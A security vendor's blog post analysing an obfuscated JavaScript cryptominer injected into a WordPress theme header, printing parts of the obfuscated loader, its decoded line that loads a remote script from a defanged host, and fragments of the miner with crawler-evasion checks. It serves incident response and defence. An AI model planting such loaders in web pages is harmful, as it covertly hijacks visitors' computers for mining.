Obfuscated JavaScript Cryptominer - Security Boulevard

Obfuscated JavaScript Cryptominer

During an incident response investigation, we detected an interesting piece of heavily obfuscated JavaScript malware. Once decoded, we found out that cryptominers were running on visitor’s computers when they accessed our customer’s website.

We have previously discussed how cryptomining can happen in many covert ways. In this post, we will show you how a malicious code can create a cryptominer.

Malware that Creates Cryptominer Code

Take a look at the following malware:

<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")
[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")
[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+
($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")
[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)
[$.$_][$.$_];$.$($.$($.$$+"""+"\"+$.__$+$.$$_+$.$$_+$.$_$_.
…...

Looking at this code can be discouraging and a bit frightening but that didn’t stop us from digging further. By reviewing the malware code carefully, we could see how the attacker cleverly created a cryptominer code and placed it into the ./wp-content/themes/responsive/header.php file.

The attacker placed the malicious code at the top of a legit file to try to disguise it. When the website opens, it executes the JavaScript code and starts mining cryptocurrencies by using the CPU of the visitor’s desktop PC or laptop.

Breaking up the Cryptominer Code

Let’s go through the malicious code step by step to see how it works…

Changing the Code Format

The first step is to refactor the code it’s in a more readable format.

Between the opening and closing JavaScript tags, is the malicious code as indicated below:

<script>
    $ = ~[];
    $ = {
        ___: ++$,
        $$$$: (![] + "")[$],
        __$: ++$,
        $_$_: (![] + "")[$],
        _$_: ++$,
        $_$$: ({} + "")[$],
        $$_$: ($[$] + "")[$],
        _$$: ++$,
        $$$_: (!"" + "")[$],
        $__: ++$,
        $_$: ++$,
        $$__: ({} + "")[$],
        $$_: ++$,
        $$$: ++$,
        $___: ++$,
        $__$: ++$
    };
.....</script>

When the obfuscated malware is decoded, the following JavaScript code will run in the next phase of the Cryptocurrency.

var el = document.createElement('script');el.src='https://web[.]clod[.]pw/js/YQHHAAUDYwBFglDXg0VSBVWyEDQ5dxGCBTN…….

If we look at the malicious code, we can see that the variable “el” contains a script object that will be pulling the final cryptominer payload from “web[.]clod[.]pw”

Comparing Cryptominers

Let’s review the similarities of the cryptominer payload that was pulled from “web[.]clod[.]pw” and see how it works.

This is a small piece of the malware:

var _0xce82=['Y3VycmVudEpvYg==','WGZxVlU=','Z2V0VG90YWxIYXNoZXM=','dmxH','ZlBsVHA=','UmhsVEQ=','Tndoa0k=','RkhQZ2c=','Z2V0QWNjZXB0ZWRIYXNoZXM=','VXZV','WnZa','aHJjYWQ=','anB1cXI=','dGtMSkE=',…...

Once we decode the pulled content  from “web[.]clad[.]pw”, we see it contains many functions to check for crawlers and mobile devices. First, we must avoid being detected by automated scans and alert the site owner. Secondly, is to rely only on devices with enough power to mine the coins. If conditions are met, the malicious code will start the cryptocurrency mining process on the visitor’s computer.

After all the functions have been tested and verified, it will run the cryptocurrency miner and execute the cryptominer script via computer hardware.

Starting to Mine Cryptocurrency

The mining process will begin mining cryptocurrency for the hacker:

if (![]) {
    if (document[_0x2ce8('0xae')][_0x2ce8('0xaf')](/google|yandex|mail|vk.com|ask|bing/) || localStorage[_0x2ce8('0xb0')](_0x2ce8('0xab'))
 || sessionStorage && sessionStorage[_0x2ce8('0xb0')](_0x2ce8('0xab')))
 {
        localStorage[_0x2ce8('0xb2')]
(_0x2ce8('0xab'), 0x1);
        sessionStorage[_0x2ce8('0xb2')]
(_0x2ce8('0xab'), 0x1);
        runMiner();

    }
} else {
    runMiner();
}
if (document[_0x2ce8('0x1d3')]) {
    var node = document[_0x2ce8('0x1d3')](_0x2ce8('0x1cd'));
    if (node && node[_0x2ce8('0x1d5')]) {
        node[_0x2ce8('0x1d5')]();
    }
}

Conclusion

Today we showed you how malware creates a cryptominer by digging into an encrypted malicious code that we came by when cleaning a compromised website.

We have already identified massive cryptominer infections targeting websites. That is why we have created an e-book on Cryptocurrency Mining Malware.
If you think your website is infected, you can trust the engineers from Sucuri to check it out and clean it for you.

*** This is a Security Bloggers Network syndicated blog from Sucuri Blog authored by Samuel Odendaal. Read the original post at: https://blog.sucuri.net/2018/10/obfuscated-javascript-cryptominer.html